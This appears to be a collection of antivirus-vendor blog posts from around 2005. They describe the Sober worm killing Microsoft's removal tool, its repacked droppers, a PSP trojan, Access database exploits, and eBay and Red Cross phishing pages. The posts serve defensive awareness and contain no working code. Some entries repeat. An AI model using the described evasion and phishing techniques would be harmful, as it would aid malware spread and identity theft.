In the new WORM_SOBER.AC, now on yellow alert, a simple yet powerful Anti Virus Retaliation is included. What”s more is that its only target is… guess who?? MICROSOFT!!

Microsoft’s new feature, the Microsoft Windows Malicious Software Removal Tool, is currently being targeted by the new Sober variant.

What it does is, it searches the list of running process for MRT.EXE (process name for Microsoft Windows Malicious Software Removal Tool), kills MRT.EXE and then displays this message box:



The message box above doubled with the detection of Microsoft Windows Malicious Software Removal Tool may make an inexperienced user feel safe and relaxed, making him think that he is not infected.

We are able to obtain samples of a new variant or the Sober worm through our handy dandy email honeypot system at approximately 8am this morning. Staying true to its Sober-like characteristics, this worm spreads via email and uses its own SMTP engine.

As of the moment, we have an incident count of 300 emails intercepted by the honeypot, and counting.

For further details, refer to the virus report which is now available for your viewing pleasure.

We have received and still are receiving samples of repacked versions of WORM_SOBER.AC. Yes, you read it right, versionS. This means that there are more samples flooding in with basically the same charateristics, yet with various MD5 hashes.

The email details of these repacked versions are different from the previous one. All of the samples from the new wave of WORM_SOBER.AC are packed using the same packer–FSG. These samples have added garbage codes. These garbge codes vary from sample to sample. Samples with the same garbage codes all have the same MD5. The difference in garbage code accounts for the difference in MD5. This is contrary to the initial loads of previous WORM_SOBER.AC samples which are UPX-packed, all with a constant MD5 value.

In case there’s any confusion here is an explanation on the “REPACKED” version of this worm

For the purpose of discussion, lets call the WORM_SOBER.AC packed with UPX as WORM_SOBER_UPX and the so called repacked version as WORM_SOBER_FSG since its packed with FSG.

When I executed WORM_SOBER_FSG it dropped and executed a copy of WORM_SOBER_UPX. Which means WORM_SOBER_FSG is just a trojan dropper for WORM_SOBER_UPX.

Hope that clears things out…

We are now receiving a new version of WORM_SOBER.AC. Insted of FSG it is now packed with MEW.

So we now have

• WORM_SOBER.AC (upx packed) – Actual WORM that spreads.
  
• WORM_SOBER.AC (FSG packed) – Dropper for WORM_SOBER.AC(UPX PACKED)
  
• WORM_SOBER.AC (MEW packed) – Dropper for WORM_SOBER.AC(UPX PACKED)

Malware are not for computers alone. Some have evolved to infecting even mobile devices and not to mention some mp3 players too. And now…. they have found another target and you may be one of them, the videogame-enthusiasts. The first trojan for Sony Playstation Portable, otherwise known as PSP has now been found. Originally PSP can only run games which are approved by Sony but of course almost if not all is possible in the computing world — hacks are available which allow users to run their own games. The trojan disguises as some hacking tool to get on board for some other games. Instead, it deletes system files, rendering the machine to be inoperable. Affected systems are those PSPs which had older firmware versions such as 1.50. Each day, malware authors have thought of widening the horizons for infection, the question now lies… what could be next?

Here is the code as seen in some forum:

_start:

sceIoAssign:

sceIoRemove:

main:



Meanwhile, we are currently acquiring sample so heads up for updates.

For more information, you may visit this site.

We are able to obtain samples of a new variant or the Sober worm through our handy dandy email honeypot system at approximately 8am this morning. Staying true to its Sober-like characteristics, this worm spreads via email and uses its own SMTP engine.

As of the moment, we have an incident count of 300 emails intercepted by the honeypot, and counting.
For further details, refer to the virus report which is now available for your viewing pleasure.

A macro script embedded in a .mdb file has been known to exploit a vulnerability in Microsoft Access “Microsoft Jet Database Engine Malformed Database File Buffer Overflow Vulnerability”, this leads to the infection of the user’s system.
This macro script is now detected as A2KM_HESIB.A.

Once this .mdb file (A2KM_HESIB.A) is opened in Microsoft Access it uses the vulnerability mentioned above to drop and execute an exe file named CSRSE.EXE (BKDR_HESIB.A) in the Windows temporary folder.

This shows that malware authors’ attacks doesn’t only include Internet Explorer and Windows OS vulnerabilities but also Microsoft Office Applications.

Another malware which targets Microsoft Office Applications is the malware family W2KM.PASSPRO

The vulnerability mentioned above still remains unpatched.

We have received a sample email of eBay phishing scam.

In an attempt to fool the recipient of the email to follow the hyperlink provided (see sample email below), it disguises as if it originates from eBay Safeharbor Department and notifies the eBay member that someone might have been using his/her account and will be suspended on the next 72 hours, unless updated.

Sample Email




If the unsuspected user clicks the hyperlink, he/she will be redirected to this page.




Notice the difference between the displayed url in the email and the destination url, it’s very different right? This should be suspicious enough not to disclose any critical information on the site. But, if the unaware user continues to enter his/her account information, he/she will end up on this page (see below).




If the still unaware user proceeds to disclose very critical information such as those asked above, the next time that he receives a notification email from eBay might just get real!

We received reports on a malware utilizing a known vulnerability found in Microsoft”s Jet Database engine software. This vulnerability was known to public last April 2005 and is related to specially crafted .mdb files. The detection for the said malware is TROJ_MSADB.B.

For now, we are currently in the process of acquiring undetected samples of malwares that utilizes this vulnerability. It is noted that Microsoft still does not have a fix on this and malware authors may exploit this known vulnerability even more. It is then recommended that users be aware of this vulnerability and not to trust unsolicited .mdb files even if it came from known contacts.

Are you some kind of a philanthropist and willing to help those in need?

I hope your donations will really reach those who need it and not those opportunistic phishers waiting to get rich!

I got an alert from one of our sources that there is a Redcross phishing site set-up in the internet. I verified the information and found out that it is indeed a Redcross phishing site! Look below and take a look at the supposedly Redcross’s donation page.




At first look, it may look legit but, look again emphasizing on the url of the site (refer to the enlarged picture). Now, does it still look legitimate to you? I hope you will agree with me for a big NO! That is one of the common techniques of Phishing, the supposedly real url is appended at the end of the actual site or domain you are visiting (in this case its www.quadrate-stadt.de). This may actually happen to those users who do not enable the view for the address bar.




By enabling the view for the address bar you can have an idea of what site or domain you are really in.

Notice the distorted rollover image (enclosed by the smaller circle)? This must have been intentional because the location where the rollover image points to is the same location where you will be redirected after you have provided the required information and pressed the continue button as shown in the next picture.




Now, this should be a lesson for all those people who use their credit or debit cards or same sort online, to be responsible enough not to disclose any information on an unsecured channel, which in this case is the use of http protocol. We should be aware that the current standard way of disclosing such information is through the use of SSL protocol or simply put sites that starts withhttps. In this way, we have at least an assurance that the information that we send in the internet is really going to the right recipient and the information is intact.

I”ve checked the different urls presented on the web site and I found out that only the location where “Continue”, “Cancel”, and “Verisign” buttons point to are the fake ones. So, if you will try to check the other clickable images or hyperlinks on the site aside from the three (3) buttons just mentioned, you will be redirected to the real site! Stealthy, isn”t it?




There are a number of phishing sites out there in the World Wide Web and many of them can be circumvented by just observing basic security measures just as I mentioned above.

These phishers continually operates or sad to say, getting inspired to set-up one because there are many online users who are still getting hooked by their scams.

If we can at least update ourselves on the current threats and especially their countermeasures such as these, we are one step ahead to securing our own identity and at the same time helping the security community to fight against this malicious activity.

And most importantly, your offered help will be received by those who really need it!:=)

Just a couple of hours ago, we received another sample email related to eBay phishing scam.

Only this time, it is more straightforward and from 72 hours of not verifying the information emailed, it was lessened to 48 hours until the account will be suspended by ‘them’. See the sample email below.




Now if you follow the first hyperlink in the email you will arrived at this page.




Now, that’s what I called straightforward! It just needs a click away to take away your identity, ha!

Notice again the difference between the displayed url in the email and the destination url? That should make you think that something ‘phishy’ is going on, at least. And what’s more suspicious about the website is the fact that it mentions

“All the data is protected by the industry standard SSL encryption”

whereas, the session is only using http protocol!

Conlusion
As we are all aware of, it was in the year 2003 where we have seen the proliferation of eBay phishing scams where users receive emails that alert them to verify and update their account information within the specified time, else the account will be suspended.

It seems like a lot are still being fooled by this scam that’s why many fake eBay sites are still being set-up, online, and ready to steal away your identity, anytime you choose to be!